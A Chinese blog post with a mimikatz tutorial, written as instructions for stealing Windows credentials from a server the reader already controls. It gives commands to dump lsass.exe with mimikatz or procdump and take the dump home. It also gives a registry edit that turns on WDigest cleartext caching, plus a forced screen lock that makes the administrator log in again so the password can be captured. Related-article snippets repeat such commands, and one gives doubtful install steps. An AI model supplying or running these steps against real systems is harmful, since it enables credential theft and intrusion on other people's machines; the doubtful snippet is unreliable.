mimikatz的使用

最新推荐文章于 2024-05-12 13:02:42 发布
最新推荐文章于 2024-05-12 13:02:42 发布
阅读量3.2w 收藏 105
点赞数 35
分类专栏: Windows 文章标签: mimikatz
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45663905/article/details/108013149
版权

目录

mimikatz是个好东西,它的功能很多,最重要的是能从 lsass.exe进程中获取windows的账号及明文密码——这是以前的事了,微软知道后已经准备了补丁,lsass进程不再保存明文口令。Mimikatz 现在只能读到加密后的密码。

使用方法:

1:远程连接使用

控制远程的服务器后,‘帮助’对方下载mimikatz,然后以管理员身份运行

privilege::debug   提取权限
sekurlsa::logonpasswords   抓取密码

在这里插入图片描述
这里抓到了administrator的账号,密码是null,说明没设密码;当然,最大的可能是没抓到密码。解决方法可以看看注意的第四点

在这里插入图片描述

2:本地使用

如果对方电脑开了防火墙,装了杀毒软件,如360,火绒,nod32之类的话。可能就不能在对方电脑上使用mimikatz
在这里插入图片描述
前面说过,mimikatz是从 lsass.exe进程中获取windows的账号及密码的,
这时,我们可以帮对方安装一个procdump64.exe(这是微软自己的工具,可以放心使用)

然后从 lsass.exe进程里导出一个 包含账号密码信息的lsass.dmp 文件,再把这个dmp文件传回来,最后在自己的环境下运行mimikatz,从 dmp文件里读取信息。

1、安装procdump64.exe

2、从procdump64.exe里导出lsass.dmp

procdump64.exe -accepteula -ma lsass.exe lsass.dmp

3、将lsass.dmp传回本地

4、使用本地的mimikatz.exe读取lsass.dmp

mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full" "exit"

我没有搞成功,就不贴图了

可以参考这几篇文章
http://www.hackdig.com/07/hack-55560.htm
https://www.cnblogs.com/kuaile1314/p/12288476.html

注意:

1、版本问题

文件夹里有两个版本,一个是对应32位系统的,一个是64位系统的。搞混了是抓不到信息的

在这里插入图片描述

2、运行权限

一定要用管理员身份运行

在这里插入图片描述

不然会提示权限不够

在这里插入图片描述

3、抓取范围

因为它是从 lsass.exe进程中获取windows的账号密码,而每次关机重启后,lsass进程中的账号信息都会清空

所以只能抓到上次关机后登录过的账号密码的信息

4、抓不到密码的解决方法

以下操作都在cmd里进行

  1. 开启Wdigest Auth服务
reg add HKLMSYSTEMCurrentControlSetControlSecurityProvidersWDigest /v UseLogonCredential /t REG_DWORD /d 1 /f
  1. 强制锁屏
rundll32 user32.dll,LockWorkStation
  1. 等待目标系统管理员重新登录
  2. 截取明文密码
  3. 关闭Wdigest Auth服务
reg add HKLMSYSTEMCurrentControlSetControlSecurityProvidersWDigest /v UseLogonCredential /t REG_DWORD /d 0 /f

但是我在写的时候出错了,说无效项名,也不知道啥原因
百度半天也没解决这个问题,暂时先记下来,等找到解决方案了再写
在这里插入图片描述

mimikatz下载链接

1、百度云盘,提取码是 kcuh
2、csdn

ihszg
关注
  • 35
    点赞
  • 105
    收藏
    觉得还不错? 一键收藏
  • 7
    评论
专栏目录
mimikatz.zip
08-14
mimikatz 是一款windows平台下的工具,它具备很多强大的功能,最重要的是可以从lsass.exe进程中获取windows的账号明文密码。
内网渗透神器(Mimikatz)——使用教程
热门推荐
W小哥
04-16 6万+
一、工具简介 Mimikatz是法国人benjamin开发的一款功能强大的轻量级调试工具,本意是用来个人测试,但由于其功能强大,能够直接读取WindowsXP-2012等操作系统的明文密码而闻名于渗透测试,可以说是渗透必备工具。 二、Mimikatz命令 cls: 清屏 standard: 标准模块,基本命令 crypto: 加密相关模块 sekurlsa: 与证书相关的模块 kerberos: kerberos模块 privilege: 提权相关模块 process: 进程相关
2024年网络安全最全内网渗透神器(Mimikatz)——使用教程,2024年最新当上项目经理才知道
最新发布
2401_84267585的博客
05-12 1796
Mimikatz是法国人benjamin开发的一款功能强大的轻量级调试工具,本意是用来个人测试,但由于其功能强大,能够直接读取WindowsXP-2012等操作系统的明文密码而闻名于渗透测试,可以说是渗透必备工具。当目标为win10或2012R2以上时,默认在内存缓存中禁止保存明文密码,但可以通过修改注册表的方式抓取明文。
萌新如何玩转mimikatz
m0_71745484的博客
02-13 5773
mimikatz就是我遇见的一个坎
哈希处理介绍-使用Mimikatz以及John对Windows用户密码破解
ran的博客
02-06 6561
Windows系统使用两种算法对用户的密码进行哈希处理, 它们分别是LM-hash算法和NTLMhash算法。所谓哈希(hash) , 就是使用一种加密函数对其进行加密。这个加密函数对一个任意长度的字符串数据进行一次数学加密函数运算,然后返回一个固定长度的字符串。Windows的系统密码hash默认情况下一般由两部分组成:第一部分是LM-hash, 第二部分是NTLM-hash。通常可从Windows系统中的SAM文件和域控制器的NTDS.dit文件中获得所有用户的hash。
【后渗透】Mimikatz使用大全
hacker3062的博客
10-14 1776
Mimikatz 是一款功能强大的轻量级调试神器,通过它你可以提升进程权限注入进程读取进程内存,当然他最大的亮点就是他可以直接从 lsass.exe 进程中获取当前登录系统用户名的密码, lsass是微软Windows系统的安全机制它主要用于本地安全和登陆策略,通常我们在登陆系统时输入密码之后,密码便会储存在 lsass内存中,经过其 wdigest 和 tspkg 两个模块调用后,对其使用可逆的算法进行加密并存储在内存之中, 而 mimikatz 正是通过对lsass逆算获取到明文密码!
技术分享 | mimikatz的常见使用方法
Uguardsec的博客
08-10 3151
0x00简介 Mimikatz 是一款功能强大的轻量级调试神器,通过它你可以提升进程权限注入进程读取进程内存,当然他最大的亮点就是他可以直接从 lsass.exe 进程中获取当前登录系统用户名的密码, lsass是微软Windows系统的安全机制它主要用于本地安全和登陆策略,通常我们在登陆系统时输入密码之后,密码便会储存在 lsass内存中,经过其 wdigest 和 tspkg 两个模块调用后,对其使用可逆的算法进行加密并存储在内存之中, 而 mimikatz 正是通过对lsass逆算获取到明文密码!也就
mimikatz使用
mirror97black的博客
04-11 6894
mimikatz使用时需要高权限,至少是administrator权限 mimikatz抓取密码的命令需要system权限,可以先进行提权 privilege::debug //提升权限(从administrator提升到system) 抓取hash sekurlsa::logonpasswords //获取当前在线用户的明文密码(需要高权限运行) lsadump::lsa ...
[后渗透]Mimikatz使用大全1
08-03
【后渗透技术】Mimikatz使用详解 Mimikatz是一款由法国安全研究员Benjamin Delpy开发的开源工具,主要用于系统权限提升、密码获取和安全审计。它以其强大的功能在网络安全领域广受欢迎,特别是在渗透测试和红队操作...
mimikatz最新版本
11-20
`README.md`是Markdown格式的说明文档,通常会包含项目简介、使用方法、更新日志等信息,是理解mimikatz使用的关键。`kiwi_passwords.yar`可能是一个规则文件,用于特定类型的密码或哈希解析。最后,`Win32`和`x64`...
mimikatz.rar
07-08
本文将详细介绍mimikatz的功能、用途以及如何使用mimikatz的核心功能之一,就是可以从lsass.exe进程中提取Windows系统的明文密码。lsass.exe是Local Security Authority Subsystem Service的缩写,是Windows操作...
mimikatz获取系统密码
03-28
2. **法律与道德**: 使用mimikatz必须遵守当地法律法规,确保在授权的范围内进行,否则可能触犯法律。 3. **防护措施**: 对于系统管理员来说,了解mimikatz的工作原理有助于增强系统的防御策略,如限制不必要的权限...
mimikatz-master源码
07-22
mimikatz-master
mimikatz工具的介绍和基本使用
菜鸟-宇的个人博客
10-02 1318
该模块是用于提权的模块。mimikatz 很多模块需要高权限运行,因此执行高权限操作模块的时候需要先利用 privilege 模块进行提权。如下命令是用于提权的命令,只能用具有管理员权限的窗口执行该命令才能成功,普通用户权限执行该提权命令会失败。
内网渗透系列之mimikatz使用以及后门植入
lza20001103的博客
09-04 4263
内网渗透系列之mimikatz使用以及后门植入 文章目录内网渗透系列之mimikatz使用以及后门植入前言mimikatz使用后门植入msf永久后门植入(1)Meterpreter后门:Metsvc(2)Meterpreter后门:PersistenceNC后门后记 前言 内网渗透最重要的环节就是权限维持,当我们获取到靶机的权限后,当对方的机器关机后,我们所获取的会话也会跟着消失,也就是说当他重新开启后,我们又得重新进行信息收集,漏洞利用,又重复着上一个渗透的过程,工程量就很大了。所以,为了能一直维持
内网渗透----使用mimikatz获取windows登陆口令
浅笑996的博客
12-01 1937
以管理员运行后,可以随机打一些字符,进入如下界面 输入aaa::aaa,可展示所有模块: 可采用log命令,保存日志 获取hash与明文用户口令 privilege::debug sekurlsa::logonPasswords 从 Windows 8.1 和 Windows Server 2012 R2 开始,LM 哈希和“纯文本”密码将不在内存中生成,早期版本的Windows ...
mimikatz常见命令
G3et的博客
01-29 1445
Mimikatz 是一款用于提取 Windows 系统中用户凭据(例如用户名和密码哈希)的开源工具。它可以在不破坏凭据的情况下轻松访问和使用这些凭据。可以被用于攻击域控制器、服务器和客户端机器,从而获得更多权限并执行恶意操作。
mimikatz】获取windows平台的用户密码以及解决报错问题记录
weixin_44723534的博客
03-26 7007
一、思路 1.准备虚拟机环境windows7、windows10 2.检查电脑是32位还是64位 3.根据电脑32位/32位下载mimikatz工具 4.提前把电脑杀毒功能关闭 5.支持获取用户密码平台 支持:windows 7、windows server 2008、windows server 2012 不支持:windows10 6.mimikatz工具功能 mimikatz工具直接从lsass.exe进程里获取windows处于active状态账号的明文密码。 支持提升进程权限、注入进程,读取进程内
mimikazi教程
tomyyyyy
08-24 2016
目录mimikazi教程1、简介1.1、背景介绍1.2、官方链接1.3、mimikatz 与凭证2、基本使用2.1、常用命令2.2、远程连接使用2.3、本地使用2.4、读取域控成员Hash2.4.1、域控本地读取2.4.2、导出域成员Hash2.4.3、secretsdump脚本直接导出域hash2.5、哈希传递2.5.1、工作组环境2.5.2 域环境2.6 票据传递攻击(PTT)2.6.1 黄...
kali 中mimikatz使用教程
06-28
### 回答1: 这是一个对于使用 Mimikatz 工具的教程。 Mimikatz 是一个开发者用来获取 Windows 认证凭证的工具,它可以解密 Windows 存储的密码,甚至可以获取经过 NTLM 身份验证的密码。 但请注意,使用这个工具可能会涉及到违法行为,请使用时慎重考虑。 ### 回答2: Mimikatz是一款用于提取Windows凭证的工具,它可以用来获取本地Windows用户和域用户的密码、NTLM哈希值和明文密码。本文将介绍如何通过Kali中的Mimikatz工具来实现提取凭证的操作。 1. 安装Mimikatz Mimikatz是Kali自带的工具,在终端中输入以下命令即可安装: ``` apt-get install mimikatz ``` 2. 运行Mimikatz 进入终端,输入以下命令来运行Mimikatz: ``` mimikatz ``` 如果你使用的是64位版本的系统,你还需要输入以下命令: ``` mimikatz # privilege::debug ``` 这个命令会给你的用户添加更多的访问权限,也就是所谓的debug权限。 3. 提取凭证 接下来,你可以通过以下命令来提取凭证: ``` mimikatz # sekurlsa::logonpasswords ``` 这个命令会输出本地计算机上所有用户的明文密码和NTLM哈希值。 如果你想获取域用户的凭证,可以使用以下命令: ``` mimikatz # sekurlsa::logonpasswords full ``` 这个命令会输出域控制器上所有域用户的明文密码和NTLM哈希值。 4. 清除日志和关闭Mimikatz 运行Mimikatz时默认会生成一些日志文件。如果你不希望这些日志留在计算机上,可以使用以下命令来清除日志: ``` mimikatz # log::clear ``` 最后,输入以下命令来关闭Mimikatz: ``` mimikatz # exit ``` 以上就是通过Kali中的Mimikatz工具来实现提取凭证的操作的详细教程。需要注意的是,Mimikatz是一款非常强大的工具,使用时请谨慎,避免造成不必要的损失。 ### 回答3: Kali是一个开源免费的渗透测试操作系统,而mimikatz是一个密码破解工具,常被黑客用于窃取用户密码,因此Kali与mimikatz结合使用可以进行密码破解和渗透测试。 首先,在Kali中下载安装mimikatz。打开终端,输入以下命令: git clone https://github.com/gentilkiwi/mimikatz.git 然后,进入mimikatz文件夹,编译mimikatz工具: cd mimikatz make 编译完成后,输入以下命令即可使用mimikatz: ./mimikatz 接下来,使用privilege模块提升权限: privilege::debug 然后,使用sekurlsa模块获取系统的登录凭据: sekurlsa::logonpasswords 最后,我们可以通过导出文件的方式保存密码信息,输入以下命令: sekurlsa::logonpasswords full log sekurlsa.log 这样就完成了在Kali中使用mimikatz的教程。需要注意的是,这种密码破解和窃取方法是非法的,只能在授权的渗透测试环境中使用。在实际的工作中,我们要始终遵循合法合规的原则,做好安全防护和风险评估工作,确保系统和数据的安全。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 7
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值